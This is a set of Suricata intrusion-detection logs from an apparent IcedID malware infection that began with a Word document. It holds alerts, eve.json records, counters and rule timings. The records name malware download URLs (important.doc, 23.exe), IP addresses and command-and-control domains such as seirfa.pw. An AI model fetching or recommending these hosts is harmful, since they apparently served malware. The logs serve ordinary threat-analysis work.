12/17/2018-15:20:24.174859  [**] [1:2022051:2] ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:20:24.174859  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 209.141.61.249:80 -> 10.12.17.101:49172
12/17/2018-15:30:52.592978  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:57671 -> 10.12.17.1:53
12/17/2018-15:35:58.089083  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:56493 -> 10.12.17.1:53
12/17/2018-15:40:59.825334  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:56054 -> 10.12.17.1:53
12/17/2018-15:46:01.192784  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:58915 -> 10.12.17.1:53
12/17/2018-15:51:03.001823  [**] [1:2016778:5] ET DNS Query to a *.pw domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.12.17.101:65495 -> 10.12.17.1:53


stats.log - (3379 bytes)
------------------------------------------------------------------------------------
Date: 1/24/2019 -- 11:52:53 (uptime: 0d, 00h 00m 03s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1485
decoder.bytes                              | Total                     | 1062600
decoder.ipv4                               | Total                     | 1485
decoder.ethernet                           | Total                     | 1485
decoder.tcp                                | Total                     | 1462
decoder.udp                                | Total                     | 23
decoder.avg_pkt_size                       | Total                     | 715
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 18
flow.udp                                   | Total                     | 10
tcp.sessions                               | Total                     | 18
tcp.syn                                    | Total                     | 18
tcp.synack                                 | Total                     | 18
tcp.rst                                    | Total                     | 14
tcp.overlap                                | Total                     | 26
detect.alert                               | Total                     | 13
detect.mpm_list                            | Total                     | 1
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 2
app_layer.flow.http                        | Total                     | 4
app_layer.tx.http                          | Total                     | 4
app_layer.flow.tls                         | Total                     | 14
app_layer.flow.dns_udp                     | Total                     | 10
app_layer.tx.dns_udp                       | Total                     | 10
flow_mgr.closed_pruned                     | Total                     | 3
flow_mgr.new_pruned                        | Total                     | 1
flow_mgr.est_pruned                        | Total                     | 8
flow.spare                                 | Total                     | 10000
flow_mgr.flows_checked                     | Total                     | 28
flow_mgr.flows_notimeout                   | Total                     | 3
flow_mgr.flows_timeout                     | Total                     | 25
flow_mgr.flows_timeout_inuse               | Total                     | 13
flow_mgr.flows_removed                     | Total                     | 12
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65508
flow_mgr.rows_maxlen                       | Total                     | 1
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7082368


eve.json - (20042 bytes)
{"timestamp":"2018-12-17T15:19:41.499045+0000","flow_id":1454674260368741,"pcap_cnt":1,"event_type":"dns","src_ip":"10.12.17.101","src_port":60979,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13164,"rrname":"13207303642.aircq.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:19:41.578500+0000","flow_id":1454674260368741,"pcap_cnt":2,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":60979,"proto":"UDP","dns":{"type":"answer","id":13164,"rcode":"NOERROR","rrname":"13207303642.aircq.com","rrtype":"A","ttl":5,"rdata":"209.141.42.165"}}
{"timestamp":"2018-12-17T15:19:42.157279+0000","flow_id":1808528025966446,"pcap_cnt":9,"event_type":"http","src_ip":"10.12.17.101","src_port":49162,"dest_ip":"209.141.42.165","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"13207303642.aircq.com","url":"\/88924438472","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2018-12-17T15:19:42.772794+0000","flow_id":1026466021016667,"pcap_cnt":63,"event_type":"http","src_ip":"10.12.17.101","src_port":49165,"dest_ip":"139.59.147.170","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"139.59.147.170","url":"\/important.doc","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2018-12-17T15:19:47.161912+0000","flow_id":1808528025966446,"pcap_cnt":64,"event_type":"fileinfo","src_ip":"209.141.42.165","src_port":80,"dest_ip":"10.12.17.101","dest_port":49162,"proto":"TCP","http":{"hostname":"13207303642.aircq.com","url":"\/88924438472","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":301,"redirect":"http:\/\/139.59.147.170\/important.doc","length":243},"app_proto":"http","fileinfo":{"filename":"\/88924438472","gaps":false,"state":"CLOSED","stored":false,"size":243,"tx_id":0}}
{"timestamp":"2018-12-17T15:19:49.871749+0000","flow_id":1026466021016667,"pcap_cnt":68,"event_type":"fileinfo","src_ip":"139.59.147.170","src_port":80,"dest_ip":"10.12.17.101","dest_port":49165,"proto":"TCP","http":{"hostname":"139.59.147.170","url":"\/important.doc","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":40960},"app_proto":"http","fileinfo":{"filename":"\/important.doc","gaps":false,"state":"CLOSED","stored":false,"size":40960,"tx_id":0}}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022482,"rev":3,"signature":"ET TROJAN JS\/Nemucod requesting EXE payload 2016-02-01","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:23.641568+0000","flow_id":2191686356098050,"pcap_cnt":77,"event_type":"alert","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022550,"rev":16,"signature":"ET CURRENT_EVENTS Possible Malicious Macro DL EXE Feb 2016","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:23.643019+0000","flow_id":2191686356098050,"pcap_cnt":86,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2022050,"rev":3,"signature":"ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021954,"rev":2,"signature":"ET TROJAN JS\/Nemucod.M.gen downloading EXE payload","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2022051,"rev":2,"signature":"ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2","category":"A Network Trojan was detected","severity":1}}
{"timestamp":"2018-12-17T15:20:24.174859+0000","flow_id":2191686356098050,"pcap_cnt":114,"event_type":"alert","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2018-12-17T15:20:24.847830+0000","flow_id":2191686356098050,"pcap_cnt":249,"event_type":"http","src_ip":"10.12.17.101","src_port":49172,"dest_ip":"209.141.61.249","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"209.141.61.249","url":"\/23.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/octet-stream"}}
{"timestamp":"2018-12-17T15:20:29.577074+0000","flow_id":2191686356098050,"pcap_cnt":250,"event_type":"fileinfo","src_ip":"209.141.61.249","src_port":80,"dest_ip":"10.12.17.101","dest_port":49172,"proto":"TCP","http":{"hostname":"209.141.61.249","url":"\/23.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/octet-stream","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":157816},"app_proto":"http","fileinfo":{"filename":"\/23.exe","gaps":false,"state":"CLOSED","stored":false,"size":157816,"tx_id":0}}
{"timestamp":"2018-12-17T15:25:33.062334+0000","flow_id":1574688554611582,"pcap_cnt":254,"event_type":"dns","src_ip":"10.12.17.101","src_port":55640,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19080,"rrname":"foxpartsearch.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:25:50.128687+0000","flow_id":1991485067032239,"pcap_cnt":259,"event_type":"dns","src_ip":"10.12.17.101","src_port":61645,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49594,"rrname":"labadegmc.com","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:25:50.154684+0000","flow_id":1991485067032239,"pcap_cnt":260,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":61645,"proto":"UDP","dns":{"type":"answer","id":49594,"rcode":"NOERROR","rrname":"labadegmc.com","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:25:50.925700+0000","flow_id":1696751526243594,"pcap_cnt":267,"event_type":"tls","src_ip":"10.12.17.101","src_port":49173,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.385891+0000","flow_id":364551455433404,"pcap_cnt":360,"event_type":"tls","src_ip":"10.12.17.101","src_port":49178,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.386656+0000","flow_id":1103135506490806,"pcap_cnt":362,"event_type":"tls","src_ip":"10.12.17.101","src_port":49181,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.386773+0000","flow_id":1192466531280198,"pcap_cnt":364,"event_type":"tls","src_ip":"10.12.17.101","src_port":49180,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.387288+0000","flow_id":1395489635358437,"pcap_cnt":366,"event_type":"tls","src_ip":"10.12.17.101","src_port":49175,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.387650+0000","flow_id":1782912865330056,"pcap_cnt":368,"event_type":"tls","src_ip":"10.12.17.101","src_port":49179,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.388064+0000","flow_id":1952495354043112,"pcap_cnt":371,"event_type":"tls","src_ip":"10.12.17.101","src_port":49176,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:25:53.388172+0000","flow_id":613599429057734,"pcap_cnt":373,"event_type":"tls","src_ip":"10.12.17.101","src_port":49177,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:26:00.190696+0000","flow_id":919650209163496,"pcap_cnt":1190,"event_type":"dns","src_ip":"10.12.17.101","src_port":57544,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7040,"rrname":"emirpa.host","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:26:01.514767+0000","flow_id":919650209163496,"pcap_cnt":1191,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":57544,"proto":"UDP","dns":{"type":"answer","id":7040,"rcode":"NOERROR","rrname":"emirpa.host","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:30:52.592978+0000","flow_id":2067712166333522,"pcap_cnt":1241,"event_type":"alert","src_ip":"10.12.17.101","src_port":57671,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:30:52.592978+0000","flow_id":2067712166333522,"pcap_cnt":1241,"event_type":"dns","src_ip":"10.12.17.101","src_port":57671,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2461,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:30:53.697404+0000","flow_id":2067712166333522,"pcap_cnt":1242,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":57671,"proto":"UDP","dns":{"type":"answer","id":2461,"rcode":"NOERROR","rrname":"seirfa.pw","rrtype":"A","ttl":5,"rdata":"195.69.187.56"}}
{"timestamp":"2018-12-17T15:30:54.330105+0000","flow_id":893717215818950,"pcap_cnt":1249,"event_type":"tls","src_ip":"10.12.17.101","src_port":49183,"dest_ip":"195.69.187.56","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org","issuerdn":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org"}}
{"timestamp":"2018-12-17T15:31:00.142808+0000","flow_id":554938785869272,"pcap_cnt":1256,"event_type":"dns","src_ip":"10.12.17.101","src_port":56248,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16266,"rrname":"emirpa.host","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:31:01.625303+0000","flow_id":554938785869272,"pcap_cnt":1257,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":56248,"proto":"UDP","dns":{"type":"answer","id":16266,"rcode":"NOERROR","rrname":"emirpa.host","rrtype":"A","ttl":5,"rdata":"185.223.163.26"}}
{"timestamp":"2018-12-17T15:31:02.297537+0000","flow_id":1272825389619754,"pcap_cnt":1264,"event_type":"tls","src_ip":"10.12.17.101","src_port":49184,"dest_ip":"185.223.163.26","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info","issuerdn":"C=US, ST=UT, O=blunts snotty, OU=Conan McMahon, CN=lander.info"}}
{"timestamp":"2018-12-17T15:35:58.089083+0000","flow_id":2096174934678523,"pcap_cnt":1310,"event_type":"alert","src_ip":"10.12.17.101","src_port":56493,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:35:58.089083+0000","flow_id":2096174934678523,"pcap_cnt":1310,"event_type":"dns","src_ip":"10.12.17.101","src_port":56493,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":38184,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:35:58.378464+0000","flow_id":2096174934678523,"pcap_cnt":1311,"event_type":"dns","src_ip":"10.12.17.1","src_port":53,"dest_ip":"10.12.17.101","dest_port":56493,"proto":"UDP","dns":{"type":"answer","id":38184,"rcode":"NOERROR","rrname":"seirfa.pw","rrtype":"A","ttl":5,"rdata":"195.69.187.56"}}
{"timestamp":"2018-12-17T15:35:59.094588+0000","flow_id":1851293079360041,"pcap_cnt":1318,"event_type":"tls","src_ip":"10.12.17.101","src_port":49185,"dest_ip":"195.69.187.56","dest_port":443,"proto":"TCP","tls":{"subject":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org","issuerdn":"C=US, ST=AZ, O=quart's Lilian's, OU=Shenyang's stillborn, CN=surveys.org"}}
{"timestamp":"2018-12-17T15:40:59.825334+0000","flow_id":2034623778101238,"pcap_cnt":1361,"event_type":"alert","src_ip":"10.12.17.101","src_port":56054,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016778,"rev":5,"signature":"ET DNS Query to a *.pw domain - Likely Hostile","category":"Potentially Bad Traffic","severity":2},"app_proto":"dns"}
{"timestamp":"2018-12-17T15:40:59.825334+0000","flow_id":2034623778101238,"pcap_cnt":1361,"event_type":"dns","src_ip":"10.12.17.101","src_port":56054,"dest_ip":"10.12.17.1","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52163,"rrname":"seirfa.pw","rrtype":"A","tx_id":0}}
{"timestamp":"2018-12-17T15:40:59.854382+0000","flow_id":2034623778101238,"pcap_cnt":1362,"event_type":"dns","src_ip":

This file has been truncated.


suricata-4.0.0-etpro-all-perf.txt-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (68566 bytes)
  --------------------------------------------------------------------------
  Date: 1/24/2019 -- 11:52:53. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2017552      1        6        19070899     25.49  152      0        16967029    125466.44   0.00        125466.44  
  2        2009028      1        11       4420105      5.91   1        0        4420105     4420105.00  0.00        4420105.00 
  3        2020865      1        3        2692625      3.60   1        0        2692625     2692625.00  0.00        2692625.00 
  4        2809145      1        2        762305       1.02   6        0        239225      127050.83   0.00        127050.83  
  5        2016855      1        2        210532       0.28   1        0        210532      210532.00   0.00        210532.00  
  6        2819664      1        2        1071916      1.43   7        0        172257      153130.86   0.00        153130.86  
  7        2819930      1        2        1069352      1.43   7        0        163831      152764.57   0.00        152764.57  
  8        2012520      1        7        162982       0.22   1        1        162982      162982.00   162982.00   0.00       
  9        2016854      1        3        159003       0.21   1        0        159003      159003.00   0.00        159003.00  
  10       2021586      1        3        1305695      1.75   14       0        136587      93263.93    0.00        93263.93   
  11       2804906      1        3        349505       0.47   4        0        128878      87376.25    0.00        87376.25   
  12       2021432      1        2        1315112      1.76   14       0        119088      93936.57    0.00        93936.57   
  13       2021433      1        2        1262741      1.69   14       0        115836      90195.79    0.00        90195.79   
  14       2816910      1        2        222579       0.30   3        0        115346      74193.00    0.00        74193.00   
  15       2021434      1        2        1249462      1.67   14       0        106796      89247.29    0.00        89247.29   
  16       2019707      1        2        454144       0.61   6        0        106343      75690.67    0.00        75690.67   
  17       2802987      1        5        665735       0.89   11       0        105073      60521.36    0.00        60521.36   
  18       2023476      1        5        1135194      1.52   14       0        102958      81085.29    0.00        81085.29   
  19       2815287      1        3        327881       0.44   6        0        96901       54646.83    0.00        54646.83   
  20       2816909      1        2        202285       0.27   3        0        94159       67428.33    0.00        67428.33   
  21       2802991      1        5        157986       0.21   2        0        91792       78993.00    0.00        78993.00   
  22       2022550      1        16       89061        0.12   1        1        89061       89061.00    89061.00    0.00       
  23       2820605      1        2        309618       0.41   6        0        88743       51603.00    0.00        51603.00   
  24       2803027      1        6        457399       0.61   6        0        87976       76233.17    0.00        76233.17   
  25       2022054      1        3        84476        0.11   1        1        84476       84476.00    84476.00    0.00       
  26       2804157      1        4        83386        0.11   1        0        83386       83386.00    0.00        83386.00   
  27       2814978      1        2        880032       1.18   14       0        83246       62859.43    0.00        62859.43   
  28       2812914      1        4        299247       0.40   5        0        79413       59849.40    0.00        59849.40   
  29       2801930      1        7        402536       0.54   6        0        78857       67089.33    0.00        67089.33   
  30       2804927      1        2        139405       0.19   2        0        78546       69702.50    0.00        69702.50   
  31       2801929      1        7        401553       0.54   6        0        78086       66925.50    0.00        66925.50   
  32       2016537      1        2        2224049      2.97   149      1        77618       14926.50    77618.00    14502.91   
  33       2018005      1        6        600810       0.80   14       0        73223       42915.00    0.00        42915.00   
  34       2814979      1        2        856281       1.14   14       0        72771       61162.93    0.00        61162.93   
  35       2815568      1        2        72430        0.10   1        0        72430       72430.00    0.00        72430.00   
  36       2022535      1        11       657054       0.88   14       0        67776       46932.43    0.00        46932.43   
  37       2804911      1        3        119735       0.16   2        0        67346       59867.50    0.00        59867.50   
  38       2014819      1        3        65231        0.09   1        0        65231       65231.00    0.00        65231.00   
  39       2822213      1        2        719636       0.96   14       0        64870       51402.57    0.00        51402.57   
  40       2804158      1        3        64764        0.09   1        0        64764       64764.00    0.00        64764.00   
  41       2820851      1        5        135468       0.18   3        0        64678       45156.00    0.00        45156.00   
  42       2802044      1        4        64610        0.09   1        0        64610       64610.00    0.00        64610.00   
  43       2802177      1        3        64501        0.09   1        0        64501       64501.00    0.00        64501.00   
  44       2013250      1        3        63725        0.09   1        0        63725       63725.00    0.00        63725.00   
  45       2022197      1        3        82832        0.11   2        0        63577       41416.00    0.00        41416.00   
  46       2008575      1        5        764534       1.02   97       0        63486       7881.79     0.00        7881.79    
  47       2812952      1        2        280379       0.37   5        0        63275       56075.80    0.00        56075.80   
  48       2022942      1        2        62569        0.08   1        0        62569       62569.00    0.00        62569.00   
  49       2016141      1        5        61471        0.08   1        1        61471       61471.00    61471.00    0.00       
  50       2804907      1        3        61195        0.08   1        0        61195       61195.00    0.00        61195.00   
  51       2821839      1        2        86248        0.12   2        0        60762       43124.00    0.00        43124.00   
  52       2803657      1        5        59145        0.08   1        0        59145       59145.00    0.00        59145.00   
  53       2022627      1        12       651250       0.87   14       0        58110       46517.86    0.00        46517.86   
  54       2103158      1        6        181086       0.24   43       0        57856       4211.30     0.00        4211.30    
  55       2812950      1        2        262479       0.35   5        0        57169       52495.80    0.00        52495.80   
  56       2812915      1        4        264173       0.35   5        0        56980       52834.60    0.00        52834.60   
  57       2816940      1        2        160701       0.21   3        0        56218       53567.00    0.00        53567.00   
  58       2018241      1        2        56126        0.08   1        0        56126       56126.00    0.00        56126.00   
  59       2018959      1        3        55363        0.07   1        1        55363       55363.00    55363.00    0.00       
  60       2812951      1        2        260846       0.35   5        0        54538       52169.20    0.00        52169.20   
  61       2023315      1        2        54091        0.07   1        0        54091       54091.00    0.00        54091.00   
  62       2025064      1        5        126098       0.17   3        0        53255       42032.67    0.00        42032.67   
  63       2802043      1        3        52759        0.07   1        0        52759       52759.00    0.00        52759.00   
  64       2023679      1        3        51635        0.07   1        0        51635       51635.00    0.00        51635.00   
  65       2022049      1        3        51324        0.07   1        0        51324       51324.00    0.00        51324.00   
  66       2023671      1        4        51011        0.07   1        0        51011       51011.00    0.00        51011.00   
  67       2022482      1        3        50681        0.07   1        1        50681       50681.00    50681.00    0.00       
  68       2013352      1        4        49823        0.07   1        0        49823       49823.00    0.00        49823.00   
  69       2017190      1        6        47889        0.06   1        0        47889       47889.00    0.00        47889.00   
  70       2809363      1        3        47461        0.06   1        0        47461       47461.00    0.00        47461.00   
  71       2816929      1        4        110301       0.15   3        0        47353       36767.00    0.00        36767.00   
  72       2023672      1        4        47307        0.06   1        0        47307       47307.00    0.00        47307.00   
  73       2022658      1        4        46707        0.06   1        0        46707       46707.00    0.00        46707.00   
  74       2020963      1        2        46644        0.06   1        0        46644       46644.00    0.00        46644.00   
  75       2826256      1        2        108714       0.15   4        0        46083       27178.50    0.00        27178.50   
  76       2014353      1        6        45975        0.06   1        0        45975       45975.00    0.00        45975.00   
  77       2022220      1        2        45966        0.06   1        0        45966       45966.00    0.00        45966.00   
  78       2022339      1        2        45856        0.06   1        0        45856       45856.00    0.00        45856.00   
  79       2800696      1        3        45747        0.06   1        1        45747       45747.00    45747.00    0.00       
  80       2022830      1        2        45348        0.06   1        0        45348       45348.00    0.00        45348.00   
  81       2816665      1        4        44832        0.06   1        0        44832       44832.00    0.00        44832.00   
  82       2022132      1        1        471712       0.63   46       0        44119       10254.61    0.00        10254.61   
  83       2018958      1        18       44091        0.06   1        0        44091       44091.00    0.00        44091.00   
  84       2008438      1        20       43984        0.06   1        0        43984       43984.00    0.00        43984.00   
  85       2022896      1        5        43743        0.06   1        0        43743       43743.00    0.00        43743.00   
  86       2012981      1        5        78678        0.11   2        0        43614       39339.00    0.00        39339.00   
  87       2024650      1        1        358277       0.48   14       0        43593       25591.21    0.00        25591.21   
  88       2009897      1        14       43531        0.06   1        0        43531       43531.00    0.00        43531.00   
  89       2022502      1        4        118228       0.16   3        0        42982       39409.33    0.00        39409.33   
  90       2823858      1        3        42960        0.06   1        0        42960       42960.00    0.00        42960.00   
  91       2009909      1        10       42907        0.06   1        0        42907       42907.00    0.00        42907.00   
  92       2822979      1        3        42631        0.06   1        0        42631       42631.00    0.00        42631.00   
  93       2019714      1        10       42350        0.06   1        0        42350       42350.00    0.00        42350.00   
  94       2816525      1        10       105791       0.14   3        0        41972       35263.67    0.00        35263.67   
  95       2009702      1        5        352397       0.47   23       0        41794       15321.61    0.00        15321.61   
  96       2022901      1        2        41248        0.06   1        0        41248       41248.00    0.00        41248.00   
  97       2811905      1        3        41244        0.06   1        0        41244       41244.00    0.00        41244.00   
  98       2013441      1        9        40860        0.05   1        0        40860       40860.00    0.00        40860.00   
  99       2815482      1        6        40833        0.05   1        0        40833       40833.00    0.00        40833.00   
  100      2020606      1        4        40597        0.05   1        0        40597       40597.00    0.00        40597.00   
  101      2816165      1        5        103871       0.14   4        0        40196       25967.75    0.00        25967.75   
